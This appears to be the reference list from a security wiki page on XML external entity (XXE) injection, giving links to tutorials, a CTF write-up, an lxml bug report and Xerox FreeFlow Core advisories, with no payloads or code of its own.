[https://ysx.me.uk/from-rss-to-xxe-feed-parsing-on-hootsuite/](https://ysx.me.uk/from-rss-to-xxe-feed-parsing-on-hootsuite/) - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20injection) - [https://gist.github.com/staaldraad/01415b990939494879b4](https://gist.github.com/staaldraad/01415b990939494879b4) - [https://medium.com/@onehackman/exploiting-xml-external-entity-xxe-injections-b0e3eac388f9](https://medium.com/@onehackman/exploiting-xml-external-entity-xxe-injections-b0e3eac388f9) - [https://portswigger.net/web-security/xxe](https://portswigger.net/web-security/xxe) - [https://gosecure.github.io/xxe-workshop/#7](https://gosecure.github.io/xxe-workshop/#7) - [Dojo CTF Challenge #42 – Hex Color Palette XXE write-up](https://www.yeswehack.com/dojo/dojo-ctf-challenge-winners-42) - [lxml bug #2107279 – Parameter-entity XXE still possible](https://bugs.launchpad.net/lxml/+bug/2107279) - [Horizon3.ai – From Support Ticket to Zero Day (FreeFlow Core XXE/SSRF + Path Traversal)](https://horizon3.ai/attack-research/attack-blogs/from-support-ticket-to-zero-day/) - [Xerox FreeFlow Core Security Guide (architecture/ports)](https://securitydocs.business.xerox.com/wp-content/uploads/2025/03/Security-Guide-Information-Assurance-Disclosure-Xerox-FreeFlow-Core-8.0.pdf) - [Xerox Security Bulletin 025-013 – FreeFlow Core 8.0.5](https://securitydocs.business.xerox.com/wp-content/uploads/2025/08/Xerox-Security-Bulletin-025-013-for-Freeflow-Core-8.0.5.pdf) {{#include ../banners/hacktricks-training.md}}